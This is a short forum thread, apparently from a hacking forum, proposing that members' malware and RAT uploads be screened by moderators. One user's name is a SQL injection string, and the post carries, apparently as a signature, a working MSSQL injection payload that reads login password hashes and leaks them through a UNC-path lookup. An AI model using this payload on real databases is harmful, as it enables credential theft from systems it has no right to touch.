Suggestion: preventive analysis on uploads

Iniciado por 'or '1'=1, Enero 31, 2017, 11:37:54 PM

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Hey every one... I'm kinda new on this forum, but I like it... well it's simple i'm member of this forum: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta from arab speakers... in this forum when someone without privilegies ( min. quantity of post required) upload something.

ex: Like crypters, rat, malware.

The uploaded file go to a queue ... so the designated members of the forum (mods) analyze the file and report if it's safe or not for the community... !!

Don't distribute malware between us, make it safe, that's all, take it like a suggestion, if it exist already fuck me and ... still doing what're doing ..


1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

We have a subforum where we move post with files and later we analise them ;D

RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta